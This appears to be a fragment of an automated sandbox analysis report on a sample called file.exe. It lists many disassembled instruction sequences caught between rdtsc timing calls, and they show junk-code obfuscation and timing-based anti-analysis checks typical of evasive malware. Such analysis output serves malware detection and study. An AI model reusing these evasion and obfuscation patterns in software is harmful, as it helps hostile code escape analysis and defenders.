              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F234 second address: B1F295 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F79A4C9A8E6h 0x00000008 jmp 00007F79A4C9A8F7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F79A4C9A8EBh 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F79A4C9A8F4h 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F79A4C9A8FBh 0x00000029 jmp 00007F79A4C9A8EFh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F295 second address: B1F299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F299 second address: B1F29E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F29E second address: B1F2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F2A4 second address: B1F2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F456 second address: B1F466 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A547B386h 0x00000008 jbe 00007F79A547B386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F466 second address: B1F4B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F79A4C9A8F9h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jmp 00007F79A4C9A8F3h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jp 00007F79A4C9A90Ch 0x0000001a push eax 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e pushad 0x0000001f jmp 00007F79A4C9A8EDh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22E72 second address: B22E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B234EF second address: B234FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24A02 second address: B24A14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2707C second address: B27083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27083 second address: B27088 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27A58 second address: B27A5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B50F second address: B2B513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28159 second address: B2815D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CA15 second address: B2CA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F79A547B386h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F79A547B395h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F0F2 second address: B2F0F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F0F8 second address: B2F0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011B second address: B3011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011F second address: B30125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F37A second address: B2F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30326 second address: B3032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3032A second address: B303DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F79A4C9A8F8h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F79A4C9A8E8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007F79A4C9A8EDh 0x0000002e mov dword ptr [ebp+122D1CAAh], esi 0x00000034 push dword ptr fs:[00000000h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F79A4C9A8E8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000018h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov dword ptr [ebp+1245B0A0h], edx 0x0000005b mov dword ptr fs:[00000000h], esp 0x00000062 movsx edi, ax 0x00000065 mov eax, dword ptr [ebp+122D09CDh] 0x0000006b push FFFFFFFFh 0x0000006d mov edi, 193D429Ch 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F79A4C9A8F9h 0x0000007b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B321D3 second address: B321EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B321EC second address: B321FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32463 second address: B32467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B340B4 second address: B340CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34298 second address: B342AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79A547B388h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F79A547B388h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3435B second address: B34379 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F79A4C9A8EDh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F79A4C9A8F4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37315 second address: B3732C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79A547B388h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F79A547B388h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B354AD second address: B354B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37601 second address: B37606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38394 second address: B3839E instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385C8 second address: B385CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385CC second address: B385D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A49B second address: B3A4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F79A547B38Ch 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B385D1 second address: B385D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A4B5 second address: B3A4BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B38696 second address: B386AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8F3h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B46B second address: B3B46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A661 second address: B3A665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B46F second address: B3B48E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c jg 00007F79A547B38Ch 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A665 second address: B3A681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F79A4C9A904h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C413 second address: B3C418 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B5AB second address: B3B5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B5B1 second address: B3B5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C559 second address: B3C55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3C55F second address: B3C563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4095E second address: B40964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40964 second address: B40975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B38Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EAC second address: B45EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45EBA second address: B45EC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F79A547B386h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46182 second address: B46195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A4C9A8EFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADB3 second address: B4ADB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4ADB8 second address: B4ADBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF39 second address: B4AF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF3F second address: B4AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F79A4C9A8EFh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F79A4C9A8EBh 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push ebx 0x0000001e jmp 00007F79A4C9A8ECh 0x00000023 pop ebx 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF81 second address: B4AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF87 second address: B4AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF8C second address: B4AF92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF92 second address: B4AF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AF96 second address: B4AFA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AFA9 second address: B4AFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AFAE second address: B4AFB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0AA second address: B4B0D8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jnl 00007F79A4C9A8E6h 0x00000010 pop edi 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jng 00007F79A4C9A8ECh 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0D8 second address: B4B0DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0DC second address: B4B0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4B0E2 second address: 96EB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jp 00007F79A547B390h 0x00000013 pop eax 0x00000014 cmc 0x00000015 push dword ptr [ebp+122D0A9Dh] 0x0000001b pushad 0x0000001c jmp 00007F79A547B394h 0x00000021 movsx ecx, dx 0x00000024 popad 0x00000025 call dword ptr [ebp+122D1FBAh] 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D1CA1h], ecx 0x00000033 jno 00007F79A547B38Bh 0x00000039 popad 0x0000003a xor eax, eax 0x0000003c jmp 00007F79A547B396h 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D1CA1h], edx 0x0000004b mov dword ptr [ebp+122D2E11h], eax 0x00000051 jmp 00007F79A547B38Dh 0x00000056 mov esi, 0000003Ch 0x0000005b ja 00007F79A547B390h 0x00000061 pushad 0x00000062 mov dl, ah 0x00000064 mov ebx, dword ptr [ebp+122D2D1Dh] 0x0000006a popad 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f sub dword ptr [ebp+122D1CB8h], ecx 0x00000075 lodsw 0x00000077 pushad 0x00000078 add al, 00000060h 0x0000007b movzx eax, bx 0x0000007e popad 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jp 00007F79A547B38Eh 0x00000089 pushad 0x0000008a mov dword ptr [ebp+122D1CAAh], edx 0x00000090 popad 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 jmp 00007F79A547B38Eh 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jmp 00007F79A547B399h 0x000000a2 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51CC1 second address: B51CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51137 second address: B5113D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5113D second address: B51141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51141 second address: B51157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F79A547B386h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51532 second address: B5154A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F79A4C9A8EAh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5154A second address: B5154E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5154E second address: B51584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F1h 0x00000007 jmp 00007F79A4C9A8EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 jmp 00007F79A4C9A8EEh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51584 second address: B5158A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5158A second address: B51590 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516DD second address: B516E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B516E1 second address: B516E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51B53 second address: B51B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A547B396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AE5A second address: B5AE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F79A4C9A8E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AE66 second address: B5AE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE23A5 second address: AE23C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F79A4C9A8E6h 0x0000000a jmp 00007F79A4C9A8F4h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59960 second address: B59966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD04 second address: B5AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F79A4C9A8EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD1A second address: B5AD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B638F7 second address: B63908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79A4C9A8EDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63908 second address: B6390E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63DDF second address: B63DF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F79A4C9A8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63DF1 second address: B63DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6445F second address: B64463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2138A second address: B2138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
